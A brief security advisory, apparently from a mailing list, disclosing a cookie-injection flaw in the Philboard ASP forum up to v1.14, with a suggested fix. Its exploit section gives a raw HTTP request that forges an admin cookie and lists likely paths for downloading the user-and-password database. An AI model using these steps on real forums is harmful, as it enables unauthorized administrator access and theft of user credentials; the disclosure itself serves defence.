Philboard Vulnerability

Severity : High (Possible gain administrator/users access on Forum Board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Status    : Vendor contacted, fixed version is not available (cause they didn't 
response)
Author    : AresU
Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka, 
and All 1ndonesian Security Team (1st)
#romance@centrin.net.id
http://www.bosen.net/releases/

Summary
=======
Philboard is freeware forum application under ASP Scripts.
Vulnerable script is on cookie management, all most script is vulnerable for 
cookie injection. The cookies are "philboard_admin=True;" or "admin=True;"

Acknowledgments
===============
Vulnerability discovery and advisory by AresU

Vendor Response
===============
Vendor has contacted and fixed version is not available (cause they didn't 
reponse)
To Fix the script, you must change every cookie command in to session command.

Exploit Code
============
1) Login Administrator Forum:
Use your telnet and open target on port 80

GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;

2) Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb


-----------------------------------------------
This mail sent through http://webmail.bosen.net